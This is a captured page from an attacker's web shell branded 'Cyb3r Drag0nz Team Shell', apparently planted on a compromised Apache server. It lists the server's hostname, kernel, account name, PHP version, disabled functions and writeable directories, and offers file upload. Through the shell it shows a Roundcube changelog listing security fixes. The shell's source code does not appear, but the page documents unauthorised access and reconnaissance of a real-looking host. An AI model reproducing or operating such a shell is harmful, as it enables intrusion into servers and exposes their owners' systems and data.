Cyb3r Drag0nz Team Shell
Cyb3rDrag0nz


Server : Apache
System : Linux wealthytechsolutions.wealthytechsolutions.com 5.14.0-611.49.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Apr 21 16:39:08 EDT 2026 x86_64
User : raybondt ( 1003)
PHP Version : 8.3.31
Disable Function : exec,passthru,shell_exec,system
Directory :  /proc/10012/root/var/softaculous/roundcube/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //proc/10012/root/var/softaculous/roundcube/changelog.txt
## Release 1.6.16

- Fix potential too long value in IMAP ID command (#10136)
- Security: Fix stored XSS/HTML/CSS injection in subject field of the draft restore dialog
- Security: Fix CSS injection bypass in HTML sanitizer via SVG `<animate attributeName="style">`
- Security: Fix pre-auth SQL injection in `virtuser_query` plugin via preg_replace backslash escape bypass
- Security: Fix SSRF bypass via specific local address URLs
- Security: Fix bypass of remote image blocking via CSS var()
- Security: Fix local/private URL fetch bypass when remote resources were not allowed
- Security: Fix pre-auth arbitrary file delete via redis/memcache session poisoning bypass
- Security: Fix code injection vulnerability - remove support for code evaluation in LDAP `autovalues` option 

## Release 1.6.15

- Fix regression where mail search would fail on non-ascii search criteria (#10121)
- Fix regression where some data url images could get ignored/lost (#10128)
- Fix SVG Animate FUNCIRI Attribute Bypass — Remote Image Loading via fill/filter/stroke

## Release 1.6.14

- Fix Postgres connection using IPv6 address (#10104)
- Security: Fix pre-auth arbitrary file write via unsafe deserialization in redis/memcache session handler
- Security: Fix bug where a password could get changed without providing the old password
- Security: Fix IMAP Injection + CSRF bypass in mail search
- Security: Fix remote image blocking bypass via various SVG animate attributes
- Security: Fix remote image blocking bypass via a crafted body background attribute
- Security: Fix fixed position mitigation bypass via use of !important
- Security: Fix XSS issue in a HTML attachment preview
- Security: Fix SSRF + Information Disclosure via stylesheet links to a local network hosts

## Release 1.6.13

- Managesieve: Fix handling of string-list format values for date tests in Out of Office (#10075)
- Fix remote image blocking bypass via SVG content reported by nullcathedral
- Fix CSS injection vulnerability reported by CERT Polska

Cyb3r Drag0nz Team